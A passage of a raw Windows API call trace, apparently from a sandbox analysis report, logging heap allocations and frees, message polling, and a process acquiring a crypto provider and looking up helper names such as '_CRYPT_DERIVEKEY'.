(hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0232.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0232.707] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0232.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.711] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0232.711] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.711] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0232.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.712] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.712] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.713] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.713] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.713] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0232.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0232.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.714] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0232.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0232.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.716] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.716] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.717] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.717] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0232.717] PeekMessageW (in: lpMsg=0x8cf3b8, 